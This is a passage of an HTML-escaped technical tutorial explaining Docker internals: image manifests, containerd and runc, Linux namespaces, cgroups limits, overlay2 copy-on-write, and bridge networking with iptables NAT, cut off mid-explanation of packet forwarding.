    &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nl"&gt;"mediaType"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"application/vnd.oci.image.layer.v1.tar+gzip"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;
      &lt;/span&gt;&lt;span class="nl"&gt;"digest"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"sha256:ghi3..."&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nl"&gt;"size"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="mi"&gt;47185920&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;},&lt;/span&gt;&lt;span class="w"&gt;
    &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nl"&gt;"mediaType"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"application/vnd.oci.image.layer.v1.tar+gzip"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;
      &lt;/span&gt;&lt;span class="nl"&gt;"digest"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"sha256:jkl4..."&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nl"&gt;"size"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="mi"&gt;5242880&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The &lt;strong&gt;config&lt;/strong&gt; blob contains the runtime metadata: environment variables, the entrypoint command, exposed ports, working directory, and the history of how each layer was built.&lt;/p&gt;




&lt;h2&gt;
  
  
  5. The Container Runtime: containerd and runc
&lt;/h2&gt;

&lt;p&gt;This is where Docker hands off actual container creation to the Linux kernel. The runtime stack has two tiers.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F35urzowty2om1bctbwlh.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F35urzowty2om1bctbwlh.png" alt="container runtime" width="800" height="447"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  containerd (High-Level Runtime)
&lt;/h3&gt;

&lt;p&gt;&lt;code&gt;containerd&lt;/code&gt; is a &lt;strong&gt;daemon&lt;/strong&gt; that manages the lifecycle of containers at a level just above the kernel. It's responsible for:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Pulling and unpacking images&lt;/strong&gt; into snapshots on disk&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Managing snapshots&lt;/strong&gt; via the storage driver (e.g., overlay2)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Invoking runc&lt;/strong&gt; to actually create and start containers&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Exposing a gRPC API&lt;/strong&gt; that dockerd (and Kubernetes, via the CRI interface) uses&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;code&gt;containerd&lt;/code&gt; is a &lt;strong&gt;CNCF graduated project&lt;/strong&gt; — it's the same runtime Kubernetes uses under the hood. This is why you can swap Docker for containerd directly in production clusters.&lt;/p&gt;

&lt;h3&gt;
  
  
  runc (Low-Level Runtime)
&lt;/h3&gt;

&lt;p&gt;&lt;code&gt;runc&lt;/code&gt; is a tiny (~5MB) binary that does the actual heavy lifting of talking to the kernel. When you ask for a new container, &lt;code&gt;runc&lt;/code&gt; does the following in sequence:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;Reads the OCI runtime spec&lt;/strong&gt; — a &lt;code&gt;config.json&lt;/code&gt; generated by containerd that describes the desired container state&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Calls &lt;code&gt;clone()&lt;/code&gt; with namespace flags&lt;/strong&gt; — this is the single syscall that creates a new process inside isolated namespaces&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Sets up cgroups&lt;/strong&gt; — attaches the new process to resource-limiting control groups&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Mounts the filesystem&lt;/strong&gt; — sets up the overlay filesystem, bind mounts, and the &lt;code&gt;/proc&lt;/code&gt; and &lt;code&gt;/sys&lt;/code&gt; pseudo-filesystems&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Drops privileges&lt;/strong&gt; — removes capabilities the container doesn't need&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Execs the entrypoint&lt;/strong&gt; — replaces itself with PID 1 inside the container&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fsrv1run3o81mpp2ppfuc.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fsrv1run3o81mpp2ppfuc.png" alt="runc" width="800" height="592"&gt;&lt;/a&gt;&lt;/p&gt;




&lt;h2&gt;
  
  
  6. Linux Namespaces: Isolation
&lt;/h2&gt;

&lt;p&gt;Namespaces are the &lt;strong&gt;kernel feature&lt;/strong&gt; that makes containers feel like separate machines. Each namespace type isolates a different aspect of the OS. A container typically lives inside &lt;strong&gt;seven&lt;/strong&gt; namespaces simultaneously.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fsox6s3bhewl4l8bnz1n6.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fsox6s3bhewl4l8bnz1n6.png" alt="namespaces isolation" width="754" height="2049"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  Namespace Breakdown
&lt;/h3&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Namespace&lt;/th&gt;
&lt;th&gt;Isolates&lt;/th&gt;
&lt;th&gt;What Happens Inside the Container&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;PID&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Process IDs&lt;/td&gt;
&lt;td&gt;Container's first process is always PID 1. It can't see or signal host processes.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;NET&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Network interfaces, routing tables, iptables&lt;/td&gt;
&lt;td&gt;Container gets its own virtual NIC, its own IP, its own loopback.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;MNT&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Mount points&lt;/td&gt;
&lt;td&gt;Container has its own filesystem tree. Host mounts are invisible.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;UTS&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Hostname &amp;amp; domain name&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;hostname&lt;/code&gt; returns the container's name, not the host's.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;IPC&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Inter-process communication (shared memory, semaphores, message queues)&lt;/td&gt;
&lt;td&gt;Containers can't read each other's &lt;code&gt;/dev/shm&lt;/code&gt;.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;USER&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;User and group IDs&lt;/td&gt;
&lt;td&gt;Maps container's root (UID 0) to an unprivileged host UID. Critical for security.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;CGROUP&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;cgroup hierarchy view&lt;/td&gt;
&lt;td&gt;Container sees only its own cgroup subtree, so it can't inspect resource limits of sibling containers.&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;The PID namespace is particularly elegant. When PID 1 inside a container exits, the &lt;strong&gt;entire container stops&lt;/strong&gt; — just like how killing PID 1 on a real Linux machine shuts everything down. This is why your entrypoint process matters so much.&lt;/p&gt;




&lt;h2&gt;
  
  
  7. cgroups: Resource Control
&lt;/h2&gt;

&lt;p&gt;While namespaces provide &lt;strong&gt;isolation&lt;/strong&gt; (what you can &lt;em&gt;see&lt;/em&gt;), cgroups provide &lt;strong&gt;control&lt;/strong&gt; (what you can &lt;em&gt;use&lt;/em&gt;). cgroups (control groups) are a Linux kernel feature that lets you partition system resources among processes.&lt;/p&gt;

&lt;p&gt;Docker uses &lt;strong&gt;cgroups v2&lt;/strong&gt; (the unified hierarchy) on modern systems.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F3kt7c9t4vbothgeumdpl.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F3kt7c9t4vbothgeumdpl.png" alt="cgroups" width="800" height="502"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  How Docker Maps Your Flags to cgroups
&lt;/h3&gt;

&lt;p&gt;When you run:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;docker run &lt;span class="nt"&gt;--cpus&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;0.5 &lt;span class="nt"&gt;--memory&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;512m &lt;span class="nt"&gt;--pids-limit&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;50 my-app
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Docker translates these into cgroup filesystem writes:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Docker Flag&lt;/th&gt;
&lt;th&gt;cgroup File&lt;/th&gt;
&lt;th&gt;Value Written&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;--cpus=0.5&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;cpu.max&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;50000 100000&lt;/code&gt; (50ms per 100ms period)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;--memory=512m&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;memory.max&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;536870912&lt;/code&gt; (bytes)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;--memory-swap=0&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;memory.swap.max&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;0&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;--pids-limit=50&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;pids.max&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;50&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;--blkio-weight=100&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;io.weight&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;100&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;The kernel &lt;strong&gt;enforces&lt;/strong&gt; these limits. If a container tries to allocate more memory than &lt;code&gt;memory.max&lt;/code&gt;, the kernel's &lt;strong&gt;OOM killer&lt;/strong&gt; kicks in and terminates the offending process. The container doesn't crash silently — it gets a &lt;code&gt;137&lt;/code&gt; (SIGKILL) exit code.&lt;/p&gt;




&lt;h2&gt;
  
  
  8. Union Filesystems and Storage Drivers
&lt;/h2&gt;

&lt;p&gt;Here's the problem: Docker images are &lt;strong&gt;read-only&lt;/strong&gt; (they're just layers stacked on top of each other), but containers need to &lt;strong&gt;write files&lt;/strong&gt; (logs, temp files, config changes). How do you let a container modify files without breaking the original image?&lt;/p&gt;

&lt;p&gt;The solution is &lt;strong&gt;overlay2&lt;/strong&gt; — think of it like transparent sheets stacked on top of each other.&lt;/p&gt;

&lt;h3&gt;
  
  
  8.1 The Transparent Sheets Analogy
&lt;/h3&gt;

&lt;p&gt;Imagine you have a stack of transparent sheets:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Bottom sheets (read-only)&lt;/strong&gt;: These are the Docker image layers. They contain &lt;code&gt;/bin/bash&lt;/code&gt;, &lt;code&gt;/usr/sbin/nginx&lt;/code&gt;, etc. You can look through them but you can't write on them.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Top sheet (writable)&lt;/strong&gt;: This is created fresh for each container. When you start a container, Docker puts a blank writable sheet on top.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;When you look down from above, you see all the sheets merged together — this is what the container sees as its filesystem (&lt;code&gt;/&lt;/code&gt;).&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fp0uwctlmfqb4vduyl03h.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fp0uwctlmfqb4vduyl03h.png" alt="transparent sheet analogy" width="800" height="761"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  8.2 Three Scenarios: Read, Write, Delete
&lt;/h3&gt;

&lt;p&gt;Let's walk through what happens when a container interacts with files:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Scenario 1: Reading an existing file&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Inside the container&lt;/span&gt;
&lt;span class="nb"&gt;cat&lt;/span&gt; /bin/bash
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;ul&gt;
&lt;li&gt;The file exists in the &lt;strong&gt;lower (image) layers&lt;/strong&gt;
&lt;/li&gt;
&lt;li&gt;overlay2 reads it directly from there&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;No copying, instant access&lt;/strong&gt;&lt;/li&gt;
&lt;li&gt;Multiple containers reading the same file? They all read the same disk blocks — zero duplication&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Scenario 2: Modifying an existing file&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Inside the container&lt;/span&gt;
&lt;span class="nb"&gt;echo&lt;/span&gt; &lt;span class="s2"&gt;"listen 8080;"&lt;/span&gt; &lt;span class="o"&gt;&amp;gt;&amp;gt;&lt;/span&gt; /etc/nginx/nginx.conf
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Here's where &lt;strong&gt;copy-on-write&lt;/strong&gt; happens:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;First&lt;/strong&gt;: The file &lt;code&gt;/etc/nginx/nginx.conf&lt;/code&gt; exists in the lower (image) layer&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Container tries to write&lt;/strong&gt;: overlay2 intercepts this&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Copy entire file up&lt;/strong&gt;: The whole file gets copied from the lower layer to the &lt;strong&gt;upper (writable) layer&lt;/strong&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Modify the copy&lt;/strong&gt;: The container writes to the copy in the upper layer&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Future reads&lt;/strong&gt;: The container now sees the modified version (upper layer wins)&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;The original file in the lower layer is &lt;strong&gt;never touched&lt;/strong&gt; — it stays pristine. When you stop and delete the container, the upper layer is destroyed. The image is unchanged.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Scenario 3: Creating a new file&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Inside the container&lt;/span&gt;
&lt;span class="nb"&gt;echo&lt;/span&gt; &lt;span class="s2"&gt;"Hello"&lt;/span&gt; &lt;span class="o"&gt;&amp;gt;&lt;/span&gt; /opt/app/new-file.txt
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;ul&gt;
&lt;li&gt;This file doesn't exist in the image layers&lt;/li&gt;
&lt;li&gt;It's created directly in the &lt;strong&gt;upper (writable) layer&lt;/strong&gt;
&lt;/li&gt;
&lt;li&gt;Only this container sees it&lt;/li&gt;
&lt;li&gt;When the container is deleted, the file vanishes&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Scenario 4: Deleting a file that exists in the image&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Inside the container  &lt;/span&gt;
&lt;span class="nb"&gt;rm&lt;/span&gt; /etc/old-config
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;ul&gt;
&lt;li&gt;The file exists in the &lt;strong&gt;lower (image) layer&lt;/strong&gt; — you can't actually delete it (it's read-only)&lt;/li&gt;
&lt;li&gt;Instead, overlay2 creates a special &lt;strong&gt;whiteout file&lt;/strong&gt; in the upper layer: &lt;code&gt;.wh.old-config&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt;When the kernel sees the whiteout file, it &lt;strong&gt;hides&lt;/strong&gt; the original file from the lower layer&lt;/li&gt;
&lt;li&gt;The container thinks the file is deleted, but it still exists in the image layer&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  8.3 Why This Matters
&lt;/h3&gt;

&lt;p&gt;This design gives Docker three critical properties:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;1. Disk efficiency&lt;/strong&gt;: Starting 100 containers from the same image uses almost zero extra disk space initially. They all share the same read-only image layers. Only the writable upper layer (which starts empty) is unique per container.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;2. Fast startup&lt;/strong&gt;: No need to copy the entire filesystem — just create an empty upper layer and you're ready to go.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;3. Image immutability&lt;/strong&gt;: The original image layers are never modified. You can run a container, mess it up completely, delete it, and start fresh from the exact same image — nothing is corrupted.&lt;/p&gt;

&lt;h3&gt;
  
  
  8.4 The Full Picture
&lt;/h3&gt;

&lt;p&gt;Here's how overlay2 actually mounts the filesystem:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Simplified version of what Docker does behind the scenes&lt;/span&gt;
mount &lt;span class="nt"&gt;-t&lt;/span&gt; overlay overlay &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;-o&lt;/span&gt; &lt;span class="nv"&gt;lowerdir&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;/var/lib/docker/overlay2/l/LAYER1:/var/lib/docker/overlay2/l/LAYER2 &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;-o&lt;/span&gt; &lt;span class="nv"&gt;upperdir&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;/var/lib/docker/overlay2/abc123/diff &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;-o&lt;/span&gt; &lt;span class="nv"&gt;workdir&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;/var/lib/docker/overlay2/abc123/work &lt;span class="se"&gt;\&lt;/span&gt;
  /var/lib/docker/overlay2/abc123/merged
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;lowerdir&lt;/strong&gt;: The read-only image layers (colon-separated list)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;upperdir&lt;/strong&gt;: The writable layer for this specific container&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;workdir&lt;/strong&gt;: Temporary scratch space overlay2 uses internally (you can ignore this)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;merged&lt;/strong&gt;: Where the unified view appears — this is what the container sees as &lt;code&gt;/&lt;/code&gt;
&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;When the container is deleted, Docker just removes the &lt;code&gt;upperdir&lt;/code&gt; and &lt;code&gt;workdir&lt;/code&gt; directories. The &lt;code&gt;lowerdir&lt;/code&gt; (image layers) stay intact and can be reused immediately for the next container.&lt;/p&gt;




&lt;h2&gt;
  
  
  9. Networking Internals
&lt;/h2&gt;

&lt;p&gt;Docker containers are isolated in their own &lt;strong&gt;network namespace&lt;/strong&gt; — they have their own network stack, their own IP address, their own routing table. But how does traffic from the outside world reach them? And how do containers talk to each other?&lt;/p&gt;

&lt;p&gt;The answer involves four key components working together like a postal system.&lt;/p&gt;

&lt;h3&gt;
  
  
  9.1 The Four Components
&lt;/h3&gt;

&lt;p&gt;Think of Docker networking like a building's internal mail system:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;veth pairs&lt;/strong&gt; — Virtual cables connecting the container to the host (like a mail slot in each apartment door)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;docker0 bridge&lt;/strong&gt; — A virtual network switch that connects all containers (like the building's mailroom)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;iptables DNAT&lt;/strong&gt; — Rewrites destination addresses for incoming packets (like the front desk forwarding mail to apartments)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;iptables SNAT&lt;/strong&gt; — Rewrites source addresses for outgoing packets (like the building's return address on all outgoing mail)&lt;/li&gt;
&lt;/ol&gt;

&lt;h3&gt;
  
  
  9.2 The Big Picture: How Traffic Flows
&lt;/h3&gt;

&lt;p&gt;Let's trace what happens when someone accesses your containerized nginx server with &lt;code&gt;docker run -p 8080:80 nginx&lt;/code&gt;:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fdj1ivr7beb3pxqveh7d1.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fdj1ivr7beb3pxqveh7d1.png" alt="how traffic flows" width="784" height="2049"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  9.3 Step-by-Step: What Happens with &lt;code&gt;-p 8080:80&lt;/code&gt;
&lt;/h3&gt;

&lt;p&gt;Let's break down the journey of a single HTTP request step by step.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Setup (happens once at container start):&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;When you run &lt;code&gt;docker run -p 8080:80 nginx&lt;/code&gt;, Docker does this:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Creates a veth pair&lt;/strong&gt; — Two virtual network interfaces connected like a pipe. One end (&lt;code&gt;veth1a2b3c&lt;/code&gt;) stays on the host, the other (&lt;code&gt;eth0&lt;/code&gt;) goes into the container's network namespace.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Attaches the host end to docker0&lt;/strong&gt; — The &lt;code&gt;docker0&lt;/code&gt; bridge is a virtual Layer 2 switch. All container veth pairs plug into it, like devices plugged into a physical switch.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Assigns an IP to the container&lt;/strong&gt; — The container's &lt;code&gt;eth0&lt;/code&gt; gets an IP from the bridge's subnet, usually &lt;code&gt;172.17.0.2/16&lt;/code&gt;. The bridge itself is &lt;code&gt;172.17.0.1&lt;/code&gt;.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Adds iptables rules&lt;/strong&gt;:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;DNAT rule&lt;/strong&gt; (PREROUTING chain): "If a packet arrives at port 8080, rewrite its destination to &lt;code&gt;172.17.0.2:80&lt;/code&gt;"&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;SNAT rule&lt;/strong&gt; (POSTROUTING chain): "If a packet from &lt;code&gt;172.17.0.0/16&lt;/code&gt; is leaving the host, rewrite its source to the host's IP"&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;&lt;strong&gt;Request path (inbound traffic):&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Now someone visits &lt;code&gt;http://192.168.1.10:8080&lt;/code&gt; from the internet:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;① Packet arrives at host NIC&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Source:      203.0.113.5:54321 (external client)
Destination: 192.168.1.10:8080 (host's public IP and exposed port)
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;② iptables DNAT rewrites destination&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;The PREROUTING rule fires:
-A PREROUTING -p tcp --dport 8080 -j DNAT --to-destination 172.17.0.2:80

Packet becomes:
Source:      203.0.113.5:54321 (unchanged)
Destination: 172.17.0.2:80 (container's IP and port)
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;③ Packet routed to docker0 bridge&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;The kernel's routing table sees destination &lt;code&gt;172.17.0.2&lt;/code&gt; is on the &lt;code&gt;docker0&lt;/code&gt; subnet. It forwards the packet to the bridge.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;④ Bridge forwards to correct veth&lt;/strong&gt;&lt;/p&gt;

